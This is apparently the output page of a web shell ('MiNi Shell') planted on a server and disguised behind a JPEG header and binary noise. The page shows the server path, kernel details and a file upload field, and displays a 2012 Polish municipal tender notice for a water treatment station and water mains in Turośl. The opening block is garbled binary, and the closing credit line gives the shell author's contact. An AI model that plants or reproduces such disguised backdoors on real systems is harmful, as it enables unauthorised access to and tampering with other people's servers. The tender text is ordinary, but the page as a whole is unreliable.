JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/491044-N-2012.html

<p class="kh_header"><b>Turośl: Budowa stacji uzdatniania wody we wsi  Leman oraz wodociągu wiejskiego wraz z przyłączami wodociągowymi we wsiach :  Łacha, Zimna,  Leman, Ksebki, Wanacja  oraz Nowa Ruda -Etap I odcinek  Łacha, Zimna, Leman.</b><br>
<b>Numer ogłoszenia: 491044 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turośl , ul. Jana Pawła II 49, 18-525 Turośl, woj. podlaskie, tel. 0-86 2786267, faks 0-86 278 61 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turosl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa stacji uzdatniania wody we wsi  Leman oraz wodociągu wiejskiego wraz z przyłączami wodociągowymi we wsiach :  Łacha, Zimna,  Leman, Ksebki, Wanacja  oraz Nowa Ruda -Etap I odcinek  Łacha, Zimna, Leman..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Część (etap) I  obejmuje:
1)Budowa  budynku parterowego z dachem dwuspadowym, krytym blacho dachówką powlekaną, budowany w technologii  tradycyjnej. Budynek podzielony jest na cztery pomieszczenia, z których jedno przeznaczone jest na pomieszczenie filtrów  i technologii z nimi związanej, pozostałe to: agregatownia, chlorownia i toaleta. Wymiary budynku: 
-  długość                              -14,80 m 
-  szerokość                          -  7,08 m
- wysokość                           -  10,32 m nad terenem (z wieżą)
- powierzchnia użytkowa     -   87,11 m2
- powierzchnia całkowita     - 104,78 m2
- powierzchnia zabudowy     -104,78 m2
- kubatura                              -395,2 m3 
 wraz z robotami drogowymi(zjazdy). 
 Budowa  stacji uzdatniania wody  o wydajności  46 m3 /h , a pompownia wody uzdatnionej do sieci zestawem hydroforowym o stałym ciśnieniu o wydajności 110 m3 /h. Stacja będzie pracować w układzie trzystopniowego systemu  pompowania. Woda surowa ze studni wierconych  pobierana będzie pompami głębinowymi i tłoczona  do stacji uzdatniania. Woda surowa zostanie napowietrzona  w systemie otwartym  na wieży napowietrzającej, a następnie poprzez zbiornik  zbierający, będzie poddana jednostopniowej  filtracji  na filtrach  pośpiesznych ciśnieniowych wypełnionych  złożami  wielowarstwowymi. Uzdatniona woda kierowana będzie do dwóch zbiorników wyrównawczych  o pojemności  150 m3 każdy , skąd zestawem pompowym  IIo podawana będzie do sieci  wodociągowej. Okresowa dezynfekcja  wykonywana będzie  przez dozowanie roztworu podchlorynu  sodu  do wody  płynącej do  zbiornika  wyrównawczego. Płukanie  złóż filtracyjnych  wykonywane będzie  wodą uzdatnioną  gromadzoną  w zbiornikach  wyrównawczych  i  powietrzem z dmuchawy. Wody pochodzące z płukania filtrów po uprzednim ich przetrzymaniu  i sklarowaniu w osadniku popłuczyn będą  odprowadzone kanalizacją z rur PCV o 0,20 m  o długości 626 m - do rowu  melioracyjnego. Stacja będzie w pełni zautomatyzowana.
2)  Budowa sieci wodociągowej we wsi Leman obejmujący:
-odcinki wodociągu z PCV  o 225 mm o łącznej długości  870,80m,
- odcinki wodociągu z PCV o 160 mm o łącznej długości 5 014,50m, 
-odcinki  wodociągu  z PCV o 110 mm o łącznej długości  11 817,00  m,
- odcinki wodociągu z  PE o  225 mm o łącznej długości  11,10  m,
- odcinki wodociągu z  PE  o  160 mm o łącznej długości 30,70  m,
- odcinki wodociągu z PE  o  110 mm o łącznej długości 95,40  m,
-odcinki wodociągu (rozprowadzające) z PE o 40 mm o łącznej długości 353,10  m,
 -przyłącza wodociągowe  z PE o 40 mm  (74 szt.)  o łącznej długości 3 246,40 m,
 -przyłącza wodociągowe z PE o 63 mm ( 2 szt.) o łącznej długości 66,20 m,
 - hydranty nadziemne o 80 mm  wraz z zasuwami odcinającymi  w ilości 74 sztuki.
2. Część (etap) II obejmuje wsie:
Zimna:
-odcinki wodociągu  z PCV o 160 mm o łącznej długości 3 345,70 m,
-odcinki wodociągu z PCV  o 110 mm o łącznej długości 5 989,90 m,
-odcinki wodociągu z  PE o  160 mm o łącznej długości 180,30 m,
-odcinki wodociągu z  PE o   110 mm o łącznej długości  9,70 m,
- odcinki wodociągu(rozprowadzające) z PE  o 40 mm o łącznej długości    236,60 m,
- przyłącza wodociągowe z PE o 40 mm ( 27 szt.) o łącznej długości  1264,90 m,
- hydranty nadziemne o 80 mm  wraz z zasuwami odcinającymi  w ilości  28 sztuk.
 Łacha: 
-odcinki wodociągu z PCV o 160 mm o łącznej długości 3 845,20 m,  
-odcinki wodociągu z PCV o 110 mm o łącznej długości 19  447,27 m, 
-odcinki wodociągu z PE    o 160 mm o łącznej długości 76,60 m, 
-odcinki wodociągu z PE o 110 mm o łącznej długości 207,20 m,    
-odcinki wodociągu (rozprowadzające)  z PE o 40 mm o łącznej długości 259,20 m, 
- odcinki wodociągu (rozprowadzające)z PE o 63 mm o łącznej długości 8,30 m,
 -przyłącza wodociągowe z PE o 40 mm ( 79 szt.) o łącznej długości  3 014,10 m,
 - przyłącza wodociągowe z PE o 63 mm ( 1 szt.) o łącznej długości  59,60 m, 
- hydranty nadziemne o 80 mm  wraz z zasuwami odcinającymi  w ilości 76 sztuk. 
Trasa wodociągu  w I części (etapie) , w II części (etapie) zlokalizowana  została w pasach  drogowych drogi powiatowej i gminnej o nawierzchni asfaltowej i gruntowej oraz na działkach prywatnych.  Wodociąg należy wykonać z rur PCV 225, 160 i 110 mm  PN 10 za wyjątkiem przejść pod ciekami powierzchniowymi , rowami melioracyjnymi i jezdniami asfaltowymi, które należy wykonać  z rur PE 100 SDFR 17 o odpowiedniej średnicy.  Montaż  rurociągów  należy wykonać  zgodnie z PN-84/B -10735.W miejscach zmiany kierunku  zastosować  łuki  PVC PN 10 właściwej    średnicy  oraz betonowe  bloki  oporowe. Bloki oporowe na załamaniach trasy i trójnika wykonać z betonu żwirowego  wg BN-81/9192/05; wymiary  i warunki  stosowania  zgodnie z BN-81/91/92/04.Głebokość ułożenia  przewodów  z rur PCV powinna wynosić minimum 1,8 m, mierzona od powierzchni terenu   do spodu rury. Do skręcania połączeń  kołnierzowych należy używać  wyłącznie  atestowanych śrub ze stali nierdzewnej. Po wykonaniu poszczególnych odcinków  wodociągu (ok. 500 m ) należy poddać je  próbie ciśnieniowej na ciśnienie próbne  w wysokości 1,5 ciśnienia roboczego, jednak nie mniej niż 1 MP zgodnie z PN-81/B 10725. Hydranty -  jako zasuwy odcinające należy zastosować zasuwy kołnierzowe, miękkouszczelniające o 80 mm. Z uwagi na lokalizację zasuw w terenie nieutwardzonym  należy je zabezpieczyć , montując w podstawach betonowych do zasuw. Trasę wodociągu oznaczyć za pomocą  taśmy ostrzegawczej z wkładką metalową  zapiętą do metalowych  elementów  armatury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.26-7, 45.23.21.50-8, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie wyznacza  szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże , że w okresie ostatnich pięciu lat  przed upływem  terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy- w tym okresie, wykonał , co najmniej:
- dwie  budowy ( rozbudowy, przebudowy)  stacji uzdatniania wody  wraz z urządzeniami  technologicznymi o wydajności  minimum 35 m3/h  każda, ze zbiornikami wyrównawczymi, z pełną  automatyka procesów  technologicznych,
-dwie roboty   polegające na budowie  sieci wodociągowej, kanalizacyjnej lub łącznie wodociągowej i kanalizacyjnej  z przyłączami  o długości  minimum  15  km  każda robota( przy czym okres ich realizacji nie przekraczał 12 miesięcy).
 Ocena  spełnienia w/w warunków dokonania zostanie zgodnie z formułą spełnia - nie spełnia , w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych  w rozdziale 6  niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać  jednoznacznie , iż w/w  warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie wyznacza  szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wskazanie przez Wykonawcę dysponowania w celu wykonania zamówienia osobami  posiadającymi uprawnienia do wykonywania samodzielnej funkcji w budownictwie w rozumieniu ustawy  z dnia 7 lipca 1994 roku Prawo budowlane  tekst jedn. Dz. U. z 2010 roku Nr 243 poz. 1623)  z póź. zmianami w zakresie:
- kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej, oraz posiadającymi aktualne zaświadczenie o członkostwie we właściwych izbach  samorządu zawodowego,
- kierowania robotami budowlanymi w specjalności  instalacyjnej  w zakresie sieci wodociągowej  oraz posiadającymi aktualne zaświadczenie o członkostwie we właściwych izbach  samorządu zawodowego, 
- kierowania robotami budowlanymi w specjalności  instalacyjnej  w zakresie sieci , instalacji i urządzeń elektrycznych oraz posiadającymi aktualne zaświadczenie o członkostwie we właściwych izbach  samorządu zawodowego ,  ze  wskazaniem  kierownika budowy o specjalności  sanitarnej.
 Ocena  spełnienia w/w warunków dokonania zostanie zgodnie z formułą spełnia - nie spełnia , w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych  w rozdziale 6  niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać  jednoznacznie , iż w/w  warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że posiada:                                                                                                    a) środki finansowe  na rachunku bankowym bądź w spółdzielczej  kasie oszczędnościowo-kredytowej lub zdolność kredytową w wysokości co najmniej  2 000 000,00 złotych. Słownie : dwa  miliony złotych,
b)opłaconą polisę lub inny dokument  ubezpieczenia  potwierdzający, że Wykonawca jest     ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający  wymaga, aby Wykonawca  był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia na kwotę minimum  1 500 000,00 złotych. Słownie: jeden milion pięćset tysięcy.
 Ocena  spełnienia w/w warunków dokonania zostanie zgodnie z formułą spełnia - nie spełnia , w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych  w rozdziale 6  niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać  jednoznacznie , iż w/w  warunki wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.turosl.pl / przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy Turośl
  18-525 Turośl, ul. Jana Pawła II 49, pok.16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:00, miejsce: Urząd  Gminy Turośl
  18-525 Turośl, ul. Jana Pawła II 49, pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt bedzie współfinansowany  ze środków  Unii  Europejskiej w ramach  działania  321 Podstawowe usługi dla gospodarki i ludności wiejskiej  objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com